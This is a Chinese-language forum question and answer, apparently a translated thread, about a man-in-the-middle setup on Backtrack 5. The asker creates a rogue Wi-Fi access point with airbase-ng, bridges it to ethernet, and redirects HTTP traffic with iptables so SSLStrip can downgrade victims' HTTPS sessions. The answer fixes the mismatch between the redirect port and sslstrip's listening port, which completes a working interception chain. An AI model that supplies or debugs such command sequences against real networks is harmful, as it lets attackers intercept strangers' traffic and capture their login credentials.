Sur*_*rni 2 packets packet-sniffers
我在使用Backtrack 5的MITM设置中遇到SSLStrip问题.我正在使用外部无线卡来广播无线信号,并通过以太网进行路由.我在Wireshark中成功查看了数据包,但我想使用SSLStrip查看SSL数据.这些是我用来设置MITM的初步命令.
airmon-ng start wlan1
airbase-ng --essid mitm 11 mon0
- 新终端 -
brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig mitm-bridge 192.168.0.199 up
echo 1 > /proc/sys/net/ipv4/ip_forward
此时,我可以在WireShark中查看数据包数据.我按照以下步骤设置SSLStrip
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
cd /pentest/web/sslstrip
sslstrip -l 8080
当我完成会话并打开sslstrip.log时,我没有看到任何写入该文件的数据.此外,一旦我执行iptables重定向,我无法访问互联网.请让我知道您认为问题可能是什么.
假设sslstrip和arp中毒已启动并运行,则表示端口重定向存在问题.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
将http流量重定向到127.0.0.1端口666.
cd/pentest/web/sslstrip
sslstrip -l 8080
启动sslstrip侦听端口8080上的传入流量
U可以将端口重定向更改为8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
或将侦听端口更改为666
sslstrip -l 666